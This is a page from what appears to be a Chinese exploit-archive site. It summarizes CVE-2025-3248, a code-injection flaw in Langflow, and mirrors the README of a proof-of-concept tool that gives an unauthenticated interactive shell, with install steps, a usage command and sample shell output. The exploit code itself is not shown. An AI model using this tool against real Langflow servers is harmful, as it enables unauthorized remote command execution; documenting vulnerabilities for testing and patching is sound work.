目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2025-3248 PoC — Langflow 安全漏洞

来源
关联漏洞
标题: Langflow 安全漏洞 (CVE-2025-3248)
Description:Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。 Langflow 1.3.0之前版本存在安全漏洞,该漏洞源于/api/v1/validate/code端点存在代码注入漏洞,可能导致远程未经验证的攻击者执行任意代码。
Description
Exploit for Langflow AI Remote Code Execution (Unauthenticated)
介绍
# CVE-2025-3248 — Langflow AI Remote Code Execution (Unauthenticated)

**Author:** 0xgh057r3c0n
---

## Description

This exploit targets a critical unauthenticated RCE vulnerability (CVE-2025-3248) in Langflow AI. The vulnerability allows an attacker to execute arbitrary system commands on the target server via the `/api/v1/validate/code` endpoint.

This proof-of-concept (PoC) tool provides an interactive shell for testing and demonstrating the issue.

---

## Prerequisites

* Python 3.8 or newer
* `pip3` for installing dependencies

---

## Installation

### 1. Clone the Repository

```bash
git clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
```

### 2. Install Python Dependencies

```bash
pip3 install -r requirements.txt
```

---

## Usage

```bash
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
```

### Example

```bash
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
```

You will be presented with an interactive shell:

```
0xgh057r3c0n@root💀$ whoami
langflow

0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
```

* To exit: type `exit` or `quit`
* Supports typical Linux/Unix shell commands

---

## Notes

* SSL verification is disabled (useful for testing self-signed certificates)
* This PoC is for educational and authorized testing purposes only

---

## License

This project is licensed under the MIT License — see the [LICENSE](LICENSE) file for details.

---

## Disclaimer

This software is provided for educational and research purposes only.
The author assumes no liability for any misuse of this code.
Use only on systems you own or have explicit permission to test.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →